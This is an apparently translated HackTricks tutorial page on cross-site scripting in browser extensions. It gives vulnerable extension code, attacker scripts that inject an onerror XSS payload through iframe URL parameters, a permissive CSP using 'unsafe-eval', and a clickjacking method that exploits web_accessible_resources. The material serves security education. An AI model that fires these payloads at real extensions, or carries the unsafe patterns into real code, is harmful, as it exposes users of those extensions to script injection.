BrowExt - XSS Example

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS红队专家）！

支持HackTricks的其他方式：

如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks，请查看订阅计划!
获取官方PEASS & HackTricks周边产品
探索PEASS家族，我们的独家NFTs
加入 💬 Discord群 或 电报群 或关注我们的Twitter 🐦 @carlospolopm。
通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。

通过Iframe进行跨站脚本（XSS）

在这个设置中，实现了一个内容脚本来实例化一个Iframe，将带有查询参数的URL作为Iframe的来源：

chrome.storage.local.get("message", result => {
let constructedURL = chrome.runtime.getURL("message.html") +
"?content=" + encodeURIComponent(result.message) +
"&redirect=https://example.net/details";
frame.src = constructedURL;
});

一个公开访问的HTML页面，message.html，旨在根据URL中的参数动态向文档主体添加内容：

$(document).ready(() => {
let urlParams = new URLSearchParams(window.location.search);
let userContent = urlParams.get("content");
$(document.body).html(`${userContent} <button id='detailBtn'>Details</button>`);
$('#detailBtn').on('click', () => {
let destinationURL = urlParams.get("redirect");
chrome.tabs.create({ url: destinationURL });
});
});

一个恶意脚本在对手的页面上执行，修改了Iframe源的content参数，引入了一个XSS payload。这是通过更新Iframe的源以包含一个有害脚本来实现的：

setTimeout(() => {
let targetFrame = document.querySelector("iframe").src;
let baseURL = targetFrame.split('?')[0];
let xssPayload = "<img src='invalid' onerror='alert(\"XSS\")'>";
let maliciousURL = `${baseURL}?content=${encodeURIComponent(xssPayload)}`;

document.querySelector("iframe").src = maliciousURL;
}, 1000);

一个过于宽松的内容安全策略，比如：

"content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self';"

允许执行JavaScript，使系统容易受到XSS攻击。

触发XSS的另一种方法是创建一个Iframe元素，并将其源设置为包含有害脚本的content参数：

let newFrame = document.createElement("iframe");
newFrame.src = "chrome-extension://abcdefghijklmnopabcdefghijklmnop/message.html?content=" +
encodeURIComponent("<img src='x' onerror='alert(\"XSS\")'>");
document.body.append(newFrame);

基于DOM的XSS + 点击劫持

这个例子取自原始帖子。

核心问题源自位于**/html/bookmarks.html中的基于DOM的跨站脚本（XSS）漏洞。有问题的JavaScript代码位于bookmarks.js**中，具体如下：

$('#btAdd').on('click', function() {
var bookmarkName = $('#txtName').val();
if ($('.custom-button .label').filter(function() {
return $(this).text() === bookmarkName;
}).length) return false;

var bookmarkItem = $('<div class="custom-button">');
bookmarkItem.html('<span class="label">' + bookmarkName + '</span>');
bookmarkItem.append('<button class="remove-btn" title="delete">x</button>');
bookmarkItem.attr('data-title', bookmarkName);
bookmarkItem.data('timestamp', (new Date().getTime()));
$('section.bookmark-container .existing-items').append(bookmarkItem);
persistData();
});

这段代码从**txtName输入字段中获取数值**，并使用字符串拼接生成HTML，然后使用jQuery的.append()函数将其附加到DOM中。

通常，Chrome扩展的内容安全策略（CSP）会防止此类漏洞。然而，由于通过‘unsafe-eval’放宽了CSP以及使用jQuery的DOM操作方法（利用globalEval()将脚本传递给eval()以在DOM插入时执行），仍然存在利用可能。

尽管这个漏洞很重要，但其利用通常取决于用户交互：访问页面、输入XSS有效负载并激活“添加”按钮。

为了增强这个漏洞，还利用了一个次要的点击劫持漏洞。Chrome扩展的清单展示了一个广泛的web_accessible_resources策略：

"web_accessible_resources": [
"html/bookmarks.html",
"dist/*",
"assets/*",
"font/*",
[...]
],

值得注意的是，/html/bookmarks.html 页面容易被嵌套，因此容易受到点击劫持的攻击。攻击者可以利用这种漏洞将页面嵌套到攻击者的网站中，并使用DOM元素覆盖页面以欺骗性地重新设计界面。这种操纵会导致受害者无意中与底层扩展进行交互。

参考资料

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS Red Team Expert）！

支持HackTricks的其他方式：

如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks，请查看订阅计划!
获取官方PEASS & HackTricks周边产品
探索PEASS家族，我们独家的NFTs收藏品
加入 💬 Discord群 或 电报群 或在Twitter上关注我们 🐦 @carlospolopm。
通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。

上一页BrowExt - permissions & host_permissions 下一页Bypass Payment Process

最后更新于1年前

hashtag通过Iframe进行跨站脚本（XSS）

hashtag基于DOM的XSS + 点击劫持

hashtag参考资料

通过Iframe进行跨站脚本（XSS）

基于DOM的XSS + 点击劫持

参考资料